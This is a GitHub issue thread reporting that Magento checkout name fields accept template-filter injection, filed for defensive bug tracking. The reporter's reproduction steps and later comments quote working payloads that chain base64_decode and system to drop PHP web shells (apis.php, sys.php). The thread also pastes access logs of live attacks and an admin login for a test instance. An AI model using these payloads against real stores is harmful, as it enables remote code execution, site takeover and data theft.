Checkout address forms allow random code in the name fields

[nkarthickannan]

Preconditions and environment

Magento version - 2.4.7-p1

Steps to reproduce

1. Install a fresh Magento latest version with sample data
2. Add to a product to shopping cart and navigate to the checkout page (either as guest or as logged in user)
3. Provide the following code in the First name and Last name fields (shipping and billing address fields)
   {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}} {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}}

Expected result

Magento should not allow to proceed by throwing an error

Actual result

Magento allows the user to proceed further without throwing an error

Additional information

Similar issue is already raised and resolved here - #38331

Release note

No response

Triage and priority

• Severity: S0 - Affects critical data or functionality and leaves users without workaround.
• Severity: S1 - Affects critical data or functionality and forces users to employ a workaround.
• Severity: S2 - Affects non-critical data or functionality and forces users to employ a workaround.
• Severity: S3 - Affects non-critical data or functionality and does not force users to employ a workaround.
• Severity: S4 - Affects aesthetics, professional look and feel, “quality” or “usability”.

[m2-assistant]

Hi @nkarthickannan. Thank you for your report.
To speed up processing of this issue, make sure that the issue is reproducible on the vanilla Magento instance following Steps to reproduce. To deploy vanilla Magento instance on our environment, Add a comment to the issue:

• @magento give me 2.4-develop instance - upcoming 2.4.x release
• For more details, review the Magento Contributor Assistant documentation.
• Add a comment to assign the issue: @magento I am working on this
• To learn more about issue processing workflow, refer to the Code Contributions.

---

Join Magento Community Engineering Slack and ask your questions in #github channel.
⚠️ According to the Magento Contribution requirements, all issues must go through the Community Contributions Triage process. Community Contributions Triage is a public meeting.
🕙 You can find the schedule on the Magento Community Calendar page.
📞 The triage of issues happens in the queue order. If you want to speed up the delivery of your contribution, join the Community Contributions Triage session to discuss the appropriate ticket.

[nkarthickannan]

@magento give me 2.4-develop instance

[magento-deployment-service]

Hi @nkarthickannan. Thank you for your request. I'm working on Magento instance for you.

[magento-deployment-service]

Hi @nkarthickannan, here is your Magento Instance: https://f98c6c8fdb7a86eb78316009476e2e09.instances-prod.magento-community.engineering
Admin access: https://f98c6c8fdb7a86eb78316009476e2e09.instances-prod.magento-community.engineering/admin_d4b5
Login: bb2031d0
Password: 51e17af08a7d

[nkarthickannan]

Issue confirmed in the default Magento provided above. Screenshots are attached here:

[jsdupuis]

I have the same issue with Magento CE 2.4.5-p8. Had 2 injection codes attack using the first name and last name fields. No validation on the checkout page.

[m2-assistant]

Hi @engcom-Bravo. Thank you for working on this issue.
In order to make sure that issue has enough information and ready for development, please read and check the following instruction: 👇

• 1. Verify that issue has all the required information. (Preconditions, Steps to reproduce, Expected result, Actual result).
• 2. Verify that issue has a meaningful description and provides enough information to reproduce the issue.
• 3. Add Area: XXXXX label to the ticket, indicating the functional areas it may be related to.
• 4. Verify that the issue is reproducible on 2.4-develop branch
  Details

  - Add the comment @magento give me 2.4-develop instance to deploy test instance on Magento infrastructure.
  - If the issue is reproducible on 2.4-develop branch, please, add the label Reproduced on 2.4.x.
  - If the issue is not reproducible, add your comment that issue is not reproducible and close the issue and stop verification process here!
• 5. Add label Issue: Confirmed once verification is complete.
• 6. Make sure that automatic system confirms that report has been added to the backlog.

[n2diving-dgx]

Similar code injection in to the customer name field of a bogus guest checkout order received on a production Magento CE 2.4.6-p6 website.

[sunit9]

I am also getting same issue. Some one is trying to add file using base 64 en coding. When i decode i got following

cd pub;echo '<?php if($_POST['p']=="Sd44Ak8H") $_POST['f'](base64_decode($_POST['c']));' > sys.php

Magento version is CE 2.4.5-p1

If anyone havae solution then please provide.

[in-session]

There seems to be a major attempt at code injection at the moment. We were also able to reproduce the same behaviour in several instances. In my evaluation, this only refers to the guest checkout. This was observed in the production system from 3 August.

{{var this.getTemp%00lateFilter().add%00AfterFilterCallback(base64_decode).add%00AfterFilterCallback(system).Filter(Y2QgcHViO2VjaG8gJzw/cGhwIGlmKCRfUE9TVFsncCddPT0iOUdtdFhRbWsiKSAkX1BPU1RbJ2YnXShiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYyddKSk7JyA+IHN5cy5waHA=)}}

cd pub;echo '<?php if($_POST['p']=="9GmtXQmk") $_POST['f'](base64_decode($_POST['c']));' > sys.php

Server error log:

2024/08/03 16:14:23 [error] 163093#163093: *6061362 access forbidden by rule, client: 127.0.0.1, server: _, request: "GET /sys.php HTTP/1.1", host: ***
2024/08/03 16:14:24 [error] 163093#163093: *6062169 access forbidden by rule, client: 127.0.0.1, server: _, request: "GET /pub/sys.php HTTP/1.1", host: ***

It seems here that it was tried using the REST Api and checkout page:

***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:13:57 +0200] "POST /rest//V1/guest-carts HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Linux; Android 11; moto g(10)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:13:58 +0200] "GET /rest//V1/products?searchCriteria[pageSize]=20 HTTP/1.1" 401 6209 "-" "Mozilla/5.0 (Linux; Android 10; Redmi Note 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:13:58 +0200] "GET /catalogsearch/result/?q=%25a%25 HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.116 Mobile DuckDuckGo/5 Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:00 +0200] "GET /de/search/%25a%25 HTTP/1.1" 200 704544 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.116 Mobile DuckDuckGo/5 Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:00 +0200] "GET /de/page_cache/block/esi/blocks/%5B%22topmenu_generic%22%5D/handles/WyJkZWZhdWx0IiwiY2F0YWxvZ3NlYXJjaF9yZXN1bHRfaW5kZXgiLCJjYXRhbG9nc2VhcmNoX3Jlc3VsdF9pbmRleF9ub3Jlc3VsdHMiXQ%3D%3D/ HTTP/1.1" 200 7647 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.116 Mobile DuckDuckGo/5 Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:00 +0200] "GET /de/page_cache/block/esi/blocks/%5B%22container-footer%22%5D/handles/WyJkZWZhdWx0IiwiY2F0YWxvZ3NlYXJjaF9yZXN1bHRfaW5kZXgiLCJjYXRhbG9nc2VhcmNoX3Jlc3VsdF9pbmRleF9ub3Jlc3VsdHMiXQ%3D%3D/ HTTP/1.1" 200 6341 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.116 Mobile DuckDuckGo/5 Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:09 +0200] "GET /*** HTTP/1.1" 200 100705 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.116 Mobile DuckDuckGo/5 Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:11 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/items HTTP/1.1" 200 169 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/115.0.5790.160 Mobile/15E148 Safari/604.1"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:11 +0200] "GET /rest//V1/directory/countries HTTP/1.1" 200 4050 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:12 +0200] "GET /rest/default/V1/directory/countries HTTP/1.1" 400 76 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:12 +0200] "GET /rest/en/V1/directory/countries HTTP/1.1" 200 4008 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:12 +0200] "GET /rest/english/V1/directory/countries HTTP/1.1" 400 76 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:13 +0200] "GET /rest/it/V1/directory/countries HTTP/1.1" 400 76 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:13 +0200] "GET /rest/italian/V1/directory/countries HTTP/1.1" 400 76 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:14 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Linux; Android 12; V2023) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:14 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Linux; Android 13; SM-G991W) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:15 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 12 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/115.0.5790.84 Mobile/15E148 Safari/604.1"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:15 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S911B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/23.0 Chrome/115.0.0.0 Mobile Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:16 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Linux; Android 11; 2201117TY) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:16 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 226 "-" "Mozilla/5.0 (Linux; Android 10; RMX1825) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.99 Mobile Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:17 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/shipping-information HTTP/1.1" 200 2277 "-" "Mozilla/5.0 (iPad; CPU OS 16_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/282.0.564912098 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:17 +0200] "GET /customer/account/create/ HTTP/1.1" 200 480398 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/104.0.5112.88 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:19 +0200] "GET /checkout HTTP/1.1" 302 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/104.0.5112.88 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:19 +0200] "GET /de/checkout/cart/ HTTP/1.1" 200 471470 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/104.0.5112.88 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:22 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/payment-information HTTP/1.1" 200 14 "-" "Mozilla/5.0 (Linux; Android 5.1.1; KFSUWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/108.9.6 like Chrome/108.0.5359.220 Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:23 +0200] "GET /sys.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (iPad; CPU OS 15_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/250.0.505561494 Mobile/15E148 Safari/604.1"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:24 +0200] "GET /pub/sys.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (iPhone; CPU OS 17_0_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) 1Password/7.10.2 (like Version/17.0.3 Mobile/21A360 Safari/600.1.4)"

The system should fix the problem with CVE-2022-24086, but the orders are still coming in and a validation should be carried out beforehand. There already seems to be a merged pull here, but it is not yet included in the core:
#38345

[engcom-Bravo]

@magento give me 2.4-develop instance